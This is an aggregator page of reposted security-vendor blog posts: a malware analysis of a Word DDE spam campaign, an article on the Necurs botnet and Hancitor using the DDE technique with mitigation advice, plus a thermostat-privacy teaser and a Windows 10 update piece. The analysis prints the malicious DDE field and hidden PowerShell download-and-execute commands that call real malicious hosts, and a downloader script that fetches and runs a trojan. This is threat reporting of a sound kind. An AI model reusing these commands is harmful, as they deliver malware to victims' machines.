All posts by Avira

Turning up the heat on smart thermostats

Smart thermostats are near the top of many shopping lists of ‘must have’ devices for the connected homes. After all, who wouldn’t want the financial and energy efficiency advantages of a programmable device without all the installation headaches? But have you considered the security and privacy issues that they might involve? Smart goes mainstream Smart […]

The post Turning up the heat on smart thermostats appeared first on Avira Blog.

Read More

A New Attack Takes Advantage of an Exploit in Word

On October 10th, researchers at the Chinese firm Qihoo 360 published an article warning of a zero-day exploit (CVE-2017-11826) affecting Office and which was already actively being exploited by attackers.

In the last few hours, we have detected a spam campaign targeting companies and making use of this exploit. This is a very dangerous attack since commands can be executed in Word with no OLE objects or macros needed. All our clients are proactively protected and updating will not be necessary thanks to Adaptive Defense 360.

Behavior

The email comes with an attached document. When opening the Word document, the first thing we see is the following message:

If we click “Yes”, the following message appears:

Next, the following message appears:

The document (sample 0910541C2AC975A49A28D7A939E48CD3) contains two pages. The first is blank, the second contains just a short message in Russian: “Error! Section unspecified.”

If we right-click the text, we can see that there is an associated field code:

If we click “Edit field”, we find the command used to exploit the vulnerability and allow the code to execute:

DDE C:\Windows\System32\cmd.exe “/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘hxxp://arkberg-design.fi/KJHDhbje71’);powershell -e $e “

 

Here is a screen shot of the process tree that is generated if the exploit is executed properly:

Exploit CVE-2017-11826 – Download and execution of malware from the Word document

Here are some of the files used in this campaign:

  • I_215854.doc
  • I_563435.doc
  • I_847923.doc
  • I_949842.doc
  • I_516947.doc
  • I_505075.doc
  • I_875517.doc
  • DC0005845.doc
  • DC000034.doc
  • DC000873.doc
  • I_958223.doc
  • I_224600.doc
  • I_510287.doc
  • I_959819.doc
  • I_615989.doc
  • I_839063.doc
  • I_141519.doc

Commands to be Executed

Depending on which simple is analyzed, we can see that the download URL changes, despite the command being essentially the same.

Sample 0910541C2AC975A49A28D7A939E48CD3

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://arkberg-design.fi/KJHDhbje71’)~powershell -e $e

Sample 19CD38411C58F5441969E039204C3007

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://ryanbaptistchurch.com/KJHDhbje71’)~powershell -e $e

Sample 96284109C58728ED0B7E4A1229825448

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://vithos.de/hjergf76’)~powershell -e $e

Sample 1CB9A32AF5B30AA26D6198C8B5C46168

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://alexandradickman.com/KJHDhbje71’)~powershell -e $e

The following powershell script is downloaded and executed:

$urls = “hxxp://shamanic-extracts.biz/eurgf837or”,”hxxp://centralbaptistchurchnj.org/eurgf837or”,””,”hxxp://conxibit.com/eurgf837or”

foreach($url in $urls){

Try

{

Write-Host $url

$fp = “$env:temprekakva32.exe”

Write-Host $fp

$wc = New-Object System.Net.WebClient

$wc.DownloadFile($url, $fp)

Start-Process $fp

break

}

Catch

{

Write-Host $_.Exception.Message

}

}

From this URL:

hxxp://shamanic-extracts.biz/eurgf837or

And a Trojan is downloaded (4F03E360BE488A3811D40C113292BC01).

MD5s from the Word document:

0910541C2AC975A49A28D7A939E48CD3
19CD38411C58F5441969E039204C3007
96284109C58728ED0B7E4A1229825448
1CB9A32AF5B30AA26D6198C8B5C46168

The post A New Attack Takes Advantage of an Exploit in Word appeared first on Panda Security Mediacenter.

Read More

Unpatched Microsoft Word DDE Exploit Being Used In Widespread Malware Attacks

ms-office-dde-malware-exploit

A newly discovered unpatched attacking method that exploits a built-in feature of Microsoft Office is currently being used in various widespread malware attack campaigns.

Last week we reported how hackers could leveraging an old Microsoft Office feature called Dynamic Data Exchange (DDE), to perform malicious code execution on the targeted device without requiring Macros enabled or memory corruption.

DDE protocol is one of the several methods that Microsoft uses to allow two running applications to share the same data.

The protocol is being used by thousands of apps, including MS Excel, MS Word, Quattro Pro, and Visual Basic for one-time data transfers and for continuous exchanges for sending updates to one another.

The DDE exploitation technique displays no “security” warnings to victims, except asking them if they want to execute the application specified in the command—although this popup alert could also be eliminated “with proper syntax modification.”

Soon after the details of DDE attack technique went public, Cisco’s Talos threat research group published a report about an attack campaign actively exploiting this attack technique in the wild to target several organisations with a fileless remote access trojan (RAT) called DNSMessenger.

Necurs Botnet Using DDE Attack to Spread Locky Ransomware

ms-office-dde-malware-exploit

Now, hackers have been found using the Necurs Botnet—malware that currently controls over 6 million infected computers worldwide and sends millions of emails—to distribute Locky ransomware and TrickBot banking trojan using Word documents that leverage the newly discovered DDE attack technique, reported SANS ISC.

Locky ransomware hackers previously relied on macros-based booby-trapped MS Office documents, but now they have updated the Nercus Botnet to deliver malware via the DDE exploit and gain an ability to take screenshots of the desktops of victims.

“What’s interesting about this new wave is that the downloader now contains new functionality to gather telemetry from victims,” Symantec said in a blog post

“It can take screen grabs and send them back to a remote server. There’s also an error-reporting capability that will send back details of any errors that the downloader encounters when it tries to carry out its activities.”

Hancitor Malware Using DDE Attack

ms-office-dde-malware-exploit

Another separate malware spam campaign discovered by security researchers has also been found distributing Hancitor malware (also known as Chanitor and Tordal) using Microsoft Office DDE exploit.

Hancitor is a downloader that installs malicious payloads like Banking Trojans, data theft malware and Ransomware on infected machines and is usually delivered as a macro-enabled MS Office document in phishing emails.

How to Protect Yourself From Word DDE Attacks?

ms-office-dde-malware-exploit

Since DDE is a Microsoft’s legitimate feature, most antivirus solutions do not flag any warning or block MS Office documents with DDE fields, neither the tech company has any plans of issuing a patch that would remove its functionality.

So, you can protect yourself and your organisation from such attacks by disabling the “update automatic links at open” option in the MS Office programs.

To do so, Open Word → Select File → Options → Advanced and scroll down to General and then uncheck “Update Automatic links at Open.”

However, the best way to protect yourself from such attacks is always to be suspicious of any uninvited document sent via an email and never click on links inside those documents unless adequately verifying the source.

Fall Creators, the new Windows 10 upgrade

Fluent Design is finally arriving to Windows 10

Earlier this year, Microsoft unveiled its Fluent Design System, a new design language for the Windows 10 interface, announcing at the same time a number of changes to the company’s software in the future. This week, the Redmond company has finally rolled out the first phase of the new system, as part of the Windows 10 Fall Creators Update.

The launch has been accompanied by a video showcasing some of the new design changes to Windows 10, although it doesn’t reveal much information about any of the future additions. The video offers a sneak peek of various components and apps that have been redesigned with new visual effects that aim to give Windows 10 more texture, depth and visual responsiveness to inputs. The new Fluent Design will roll out gradually, starting with its own apps and elements like the Start menu, Action Center and notifications. Microsoft has stated that these are just the first steps of the project and that new features and capabilities will be introduced in the future.

Fluent Design System is designed to be the successor to Microsoft’s Metro design and will appear across apps and services on Windows, iOS and Android. Microsoft is focusing on light, depth, motion and scale, with animations that add a sense of fluidity during interactions, in contrast to the minimalistic, tile-based interface of the past. Besides incorporating the first phase of Fluent Design System, Windows 10 Fall Creators Update also introduces OneDrive Files On-Demand, a new feature that allows users to access their documents without having to download them. Microsoft Edge has also been improved, incorporating a new tool to manage Favorites and the ability to import settings from Chrome. Finally, the operating system includes a new GPU monitoring option in the Task Manager.

More new features yet to come

We’re expecting to see even more changes in the next Windows 10 update, which is currently in development under the codename Redstone 4. Microsoft has started testing the initial features for this version, which is scheduled for March 2018. The main addition so far is a new Cortana Collections feature, which will see and remember users’ browsing habits. As Microsoft finishes its functionality tests, new information will be unveiled about the new improvements, in addition to a new Timeline feature that will let users resume sessions and apps on Windows PCs, iOS and Android devices more easily.

This update does not affect the operation of the Windows 10-compatible antivirus solutions available on the market, including the entire Panda Antivirus product line. So, installing a professional antivirus tool is not only possible, but highly recommended. In this context, the latest version of Panda’s antivirus solutions has the added guarantee of having achieved one of the best detection rates in the latest edition of the AV-Comparatives professional antivirus comparative review.

The post Fall Creators, the new Windows 10 upgrade appeared first on Panda Security Mediacenter.

Read More